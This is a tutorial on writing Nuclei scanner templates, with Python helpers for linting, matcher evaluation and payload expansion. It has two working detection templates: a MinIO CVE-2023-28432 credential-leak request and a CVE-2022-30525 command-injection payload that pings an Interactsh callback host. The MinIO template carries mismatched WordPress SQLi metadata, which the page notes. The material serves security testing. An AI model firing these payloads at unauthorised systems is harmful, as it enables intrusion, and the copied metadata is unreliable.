Nuclei PoC development - environment setup & writing workflow
- Development environment: VS Code + the YAML extension
- Reference documentation:
  https://docs.nuclei.sh/template-guide/introduction
Nuclei PoC development - YAML syntax & matching/extraction
YAML is a data serialization language; its basic syntax rules are:
- case sensitive
- indentation expresses nesting
- the Tab key must not be used for indentation, only spaces
- the exact number of spaces does not matter, as long as elements at the same level are left-aligned
YAML PoC template sections:
- id: the template identifier
- info: template information
- http / file / tcp etc.: the request(s)
- matchers (including Interactsh): matching
- extractors: extraction
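The two lists above (YAML rules, template sections) are the things a reviewer checks first when a PoC does not load. The following is an added example, not code from the page or from the nuclei project: a small text-level lint that flags tab indentation, a malformed id, missing required info keys, a missing protocol section, the legacy `requests:` key and a request section without matchers. The two template strings are constructed inputs; the real check remains `nuclei -validate -t <template>`.

```python
import re

# Building blocks of a nuclei template as listed on the page: id, info,
# a protocol section (http / file / tcp ...), matchers and extractors.
PROTOCOL_KEYS = ("http", "requests", "network", "tcp", "file", "dns", "headless", "ssl")
INFO_REQUIRED = ("name", "author", "severity")
SEVERITIES = ("info", "low", "medium", "high", "critical", "unknown")
ID_PATTERN = re.compile(r"^[A-Za-z0-9._-]+$")


def section_lines(lines, key):
    """Lines indented under the top-level key `key` (empty list if absent)."""
    out, inside = [], False
    for line in lines:
        if re.match(r"^%s:" % re.escape(key), line):
            inside = True
            continue
        if inside and line and not line[0].isspace():   # next top-level key
            break
        if inside:
            out.append(line)
    return out


def lint_template(text):
    """Return a list of problems found in a template given as YAML text.

    Pure text checks (no YAML parser needed) for the rules on the page:
    spaces-only indentation, a usable id, the required info keys and at
    least one protocol section that actually carries matchers."""
    problems = []
    lines = text.splitlines()
    for n, line in enumerate(lines, 1):
        leading = line[: len(line) - len(line.lstrip())]
        if "\t" in leading:
            problems.append("line %d: tab in indentation, YAML allows spaces only" % n)

    # top-level keys: lines that start in column 0 and look like "key:"
    top = {l.split(":", 1)[0] for l in lines if l and not l[0].isspace() and ":" in l}

    id_line = next((l for l in lines if l.startswith("id:")), None)
    if id_line is None:
        problems.append("missing top-level 'id'")
    else:
        id_value = id_line[len("id:"):].strip()
        if not ID_PATTERN.match(id_value):
            problems.append("id %r should be a simple token such as CVE-2023-28432" % id_value)

    if "info" not in top:
        problems.append("missing top-level 'info'")
    info = section_lines(lines, "info")
    info_keys = {l.strip().split(":", 1)[0]: l.split(":", 1)[1].strip()
                 for l in info if ":" in l and not l.strip().startswith("-")}
    for key in INFO_REQUIRED:
        if key not in info_keys:
            problems.append("info is missing '%s'" % key)
    if info_keys.get("severity") and info_keys["severity"] not in SEVERITIES:
        problems.append("unknown severity %r" % info_keys["severity"])

    protocols = [k for k in PROTOCOL_KEYS if k in top]
    if not protocols:
        problems.append("no protocol section (http, tcp, file ...)")
    if "requests" in top:
        problems.append("'requests' is the legacy name for the http section; prefer 'http'")
    for proto in protocols:
        if not any(l.strip().startswith("matchers") for l in section_lines(lines, proto)):
            problems.append("%s section has no matchers, the template can never report a match" % proto)
    return problems


# Constructed sample templates (not real PoCs): one clean, one with typical mistakes.
GOOD_TEMPLATE = """\
id: example-env-leak

info:
  name: Constructed example template
  author: example-author
  severity: high

http:
  - raw:
      - |
        GET /status HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "EXAMPLE_SECRET"
"""

BAD_TEMPLATE = """\
id: my template
info:
\tname: broken
\tseverity: urgent
requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
"""

if __name__ == "__main__":
    for label, tpl in (("good", GOOD_TEMPLATE), ("bad", BAD_TEMPLATE)):
        print(label, lint_template(tpl) or "no problems")
```

The bad sample trips every check: two tab-indented lines, an id containing a space, no author, an invalid severity, the legacy `requests:` key and a request with no matchers.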
Development workflow:
- copy an existing PoC template and adapt it
- give the PoC its own unique id
- fill in the detailed info
- write the protocol/request flow
- decide on the result matching mode
- decide on the result extraction mode
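The last two steps (matching mode, extraction mode) are where most template logic lives, so it helps to see exactly how nuclei's `matchers` and `extractors` semantics combine: per-matcher `condition` (and/or), `negative`, `part`, and the block-level `matchers-condition`. The code below is an added example written for this page, not nuclei's own implementation: a minimal evaluator for `status`, `word` and `regex` matchers plus a `regex` extractor, run against two constructed responses (the placeholder values are not real credentials). The matcher block mirrors the shape used in real templates.

```python
import re

# Constructed responses standing in for what a scanned service returns.
# The values are placeholders, not real credentials.
LEAKY_RESPONSE = {
    "status_code": 200,
    "header": "HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n",
    "body": "MINIO_ROOT_USER=<constructed>\nMINIO_ROOT_PASSWORD=<constructed>\n",
}
SAFE_RESPONSE = {
    "status_code": 403,
    "header": "HTTP/1.1 403 Forbidden\r\nContent-Type: text/html\r\n",
    "body": "<html><body>Access denied</body></html>",
}

# Constructed matcher/extractor block in the shape nuclei templates use.
HTTP_BLOCK = {
    "matchers-condition": "and",
    "matchers": [
        {"type": "status", "status": [200]},
        {"type": "word", "part": "body", "condition": "and",
         "words": ["MINIO_ROOT_USER", "MINIO_ROOT_PASSWORD"]},
        # negative matcher: rule out HTML error pages that happen to echo input
        {"type": "word", "part": "body", "negative": True, "words": ["<html"]},
    ],
    "extractors": [
        # report which variable names leaked, without extracting their values
        {"type": "regex", "group": 1, "regex": [r"(MINIO_ROOT_[A-Z]+)="]},
    ],
}


def response_part(response, part):
    """Select the response text a matcher or extractor operates on."""
    if part == "header":
        return response["header"]
    if part == "all":
        return response["header"] + response["body"]
    return response["body"]          # nuclei's default part for http


def evaluate_matcher(matcher, response):
    """Evaluate one matcher; returns True when it fires."""
    kind = matcher["type"]
    if kind == "status":
        hit = response["status_code"] in matcher["status"]
    else:
        text = response_part(response, matcher.get("part", "body"))
        if kind == "word":
            hits = [w in text for w in matcher["words"]]
        elif kind == "regex":
            hits = [re.search(p, text) is not None for p in matcher["regex"]]
        else:
            raise ValueError("unsupported matcher type %r" % kind)
        # condition defaults to "or": any single word/regex hitting is enough
        hit = all(hits) if matcher.get("condition", "or") == "and" else any(hits)
    # negative: true inverts the result
    return (not hit) if matcher.get("negative") else hit


def template_matches(http_block, response):
    """Combine all matchers with matchers-condition (default "or")."""
    results = [evaluate_matcher(m, response) for m in http_block["matchers"]]
    if http_block.get("matchers-condition", "or") == "and":
        return all(results)
    return any(results)


def run_extractors(http_block, response):
    """Run regex extractors and return the captured groups in order."""
    found = []
    for ex in http_block.get("extractors", []):
        if ex["type"] != "regex":
            raise ValueError("only regex extractors are implemented here")
        text = response_part(response, ex.get("part", "body"))
        for pattern in ex["regex"]:
            found.extend(m.group(ex.get("group", 0)) for m in re.finditer(pattern, text))
    return found


if __name__ == "__main__":
    for label, resp in (("leaky", LEAKY_RESPONSE), ("safe", SAFE_RESPONSE)):
        print(label, template_matches(HTTP_BLOCK, resp), run_extractors(HTTP_BLOCK, resp))
```

Two details worth noting when writing your own matchers: the per-matcher `condition` defaults to `or`, so a word list without `condition: and` fires on any single word, and `matchers-condition` is what ties the status check and the word check together; leaving it out means either one alone reports a match.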
Case 1: CVE-2023-28432 (matching on the response)
https://github.com/vulhub/vulhub/blob/master/minio/CVE-2023-28432/README.zh-cn.md
Note that the info block below still carries the description, references and classification of the WordPress plugin template it was copied from; the "fill in the detailed info" step of the workflow has not yet been applied to it.

id: CVE-2023-28432

info:
  name: MinIO
  author: xiaodisec
  severity: high
  description: |
    WordPress
  impact: |
    Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary SQL queries on the WordPress database, potentially leading to unauthorized access, data manipulation, or privilege escalation.
  remediation: Fixed in version 10.8.
  reference:
    - https://wpscan.com/vulnerability/6a3b6752-8d72-4ab4-9d49-b722a947d2b0
    - https://wordpress.org/plugins/wp-tripadvisor-review-slider/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0261
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-28432
    cwe-id: CWE-89
    epss-score: 0.3054
    epss-percentile: 0.96509
    cpe: cpe:2.3:a:ljapps:wp_tripadvisor_review_slider:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: ljapps
    product: wp_tripadvisor_review_slider
    framework: wordpress
  tags: time-based-sqli,cve2023,cve,wordpress,wp,wp-tripadvisor-review-slider,auth,sqli,wp-plugin,wpscan,ljapps

http:
  - raw:
      - |
        POST /minio/bootstrap/v1/verify HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Accept-Language: en-US;q=0.9,en;q=0.8
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
        Connection: close
        Cache-Control: max-age=0
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 0

    matchers:
      - type: word
        words:
          - 'MINIO_ROOT_USER'
          - 'MINIO_ROOT_PASSWORD'
        condition: and

Case 2: CVE-2022-30525 (matching on the Interactsh interaction)
blog.csdn.net/weixin_43080961/article/details/124776553

id: CVE-2022-30525

info:
  name: xiaodisec
  author: remote
  severity: high
  tags: CVE-2022-30525
  reference: CVE-2022-30525

requests:
  - raw:
      - |
        POST /ztp/cgi-bin/handler HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=utf-8

        {"command": "setWanPortSt","proto": "dhcp","port": "1270","vlan_tagged": "1270","vlanid": "1270","mtu": "{{exploit_payload}}","data":""}

    payloads:
      exploit_payload:
        - "; ping -c 3 {{interactsh-url}};"
    attack: pitchfork

    matchers:
      - type: word
        part: interactsh_protocol
        name: dns
        words:
          - "dns"

Nuclei PoC development - BurpSuite template generator plugin
https://github.com/projectdiscovery/nuclei-burp-plugin
- import the extension or install it from the BApp Store
- configure the plugin's path settings
- select a request and generate a template from it
- edit the template's info, test it and submit it
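Returning to case 2 above: that template relies on two mechanisms that are easy to get wrong, `payloads` with an `attack` mode (how `{{exploit_payload}}` placeholders are filled per request) and a matcher on `interactsh_protocol` (deciding from the out-of-band callback log rather than from the HTTP response). The following is an added example written for this page, not nuclei's own code: it expands payload sets in pitchfork and clusterbomb mode, renders placeholders, evaluates an Interactsh-style matcher over a constructed callback log, and correlates the callback back to the request whose marker caused it. It goes beyond the page's single payload set to show why pitchfork and clusterbomb differ. The placeholder names `field` and `marker`, the hostnames and the interaction record are all constructed; the marker values are plain DNS canaries, not commands.

```python
import itertools
import re

PLACEHOLDER = re.compile(r"\{\{([A-Za-z0-9_-]+)\}\}")

# Constructed stand-ins for values nuclei fills in at run time (not real hosts).
RUNTIME_VARS = {"Hostname": "target.invalid", "interactsh-url": "abc123.oast.invalid"}

# Constructed raw request and payload sets; the placeholder names are assumptions.
RAW_REQUEST = (
    "POST /api/config HTTP/1.1\r\n"
    "Host: {{Hostname}}\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"field": "{{field}}", "value": "{{marker}}"}'
)
PAYLOADS = {
    "field": ["mtu", "name"],
    "marker": ["probe-a.{{interactsh-url}}", "probe-b.{{interactsh-url}}"],
}

# Constructed OAST log: one DNS lookup carrying the first marker.
INTERACTIONS = [
    {"protocol": "dns", "raw-request": "probe-a.abc123.oast.invalid. IN A"},
]
DNS_MATCHER = {"type": "word", "part": "interactsh_protocol", "name": "dns", "words": ["dns"]}


def expand_payloads(payloads, attack):
    """One {name: value} dict per request, following nuclei's attack modes:
    pitchfork pairs the i-th value of every set, clusterbomb tries all combinations."""
    names = list(payloads)
    if attack == "pitchfork":
        combos = zip(*(payloads[n] for n in names))
    elif attack == "clusterbomb":
        combos = itertools.product(*(payloads[n] for n in names))
    else:
        raise ValueError("unsupported attack mode %r" % attack)
    return [dict(zip(names, values)) for values in combos]


def render(text, variables):
    """Replace every {{name}} with its value; fail loudly on an unknown name."""
    def substitute(match):
        name = match.group(1)
        if name not in variables:
            raise KeyError("unresolved placeholder {{%s}}" % name)
        return variables[name]
    return PLACEHOLDER.sub(substitute, text)


def build_requests(raw, payloads, attack, runtime_vars):
    """Return [(variables, rendered request)] for each payload combination.
    Payload values may themselves contain {{interactsh-url}}, so they are rendered first."""
    requests = []
    for payload_vars in expand_payloads(payloads, attack):
        variables = dict(runtime_vars)
        variables.update({k: render(v, runtime_vars) for k, v in payload_vars.items()})
        requests.append((variables, render(raw, variables)))
    return requests


def interactsh_matcher_hits(matcher, interactions):
    """Word matcher over the callback log instead of the HTTP response.
    part interactsh_protocol checks the protocol field, interactsh_request the raw callback."""
    key = {"interactsh_protocol": "protocol", "interactsh_request": "raw-request"}[matcher["part"]]
    need_all = matcher.get("condition", "or") == "and"
    for interaction in interactions:
        hits = [w in interaction.get(key, "") for w in matcher["words"]]
        if all(hits) if need_all else any(hits):
            return True
    return False


def triggered_requests(requests, interactions, marker_name="marker"):
    """Indices of requests whose marker value appears in a recorded callback."""
    return [i for i, (variables, _) in enumerate(requests)
            if any(variables[marker_name] in it.get("raw-request", "") for it in interactions)]


if __name__ == "__main__":
    reqs = build_requests(RAW_REQUEST, PAYLOADS, "pitchfork", RUNTIME_VARS)
    print(len(reqs), "requests in pitchfork mode,",
          len(build_requests(RAW_REQUEST, PAYLOADS, "clusterbomb", RUNTIME_VARS)), "in clusterbomb")
    print("dns callback matched:", interactsh_matcher_hits(DNS_MATCHER, INTERACTIONS))
    print("callback came from request(s):", triggered_requests(reqs, INTERACTIONS))
```

With one payload set, as in case 2, pitchfork and clusterbomb produce the same single request; the difference only appears with two or more sets. Correlating the callback back to a specific request (the last function) is what makes an Interactsh-based finding reviewable afterwards: a `dns` protocol match alone says that something resolved the OAST hostname, not which request caused it.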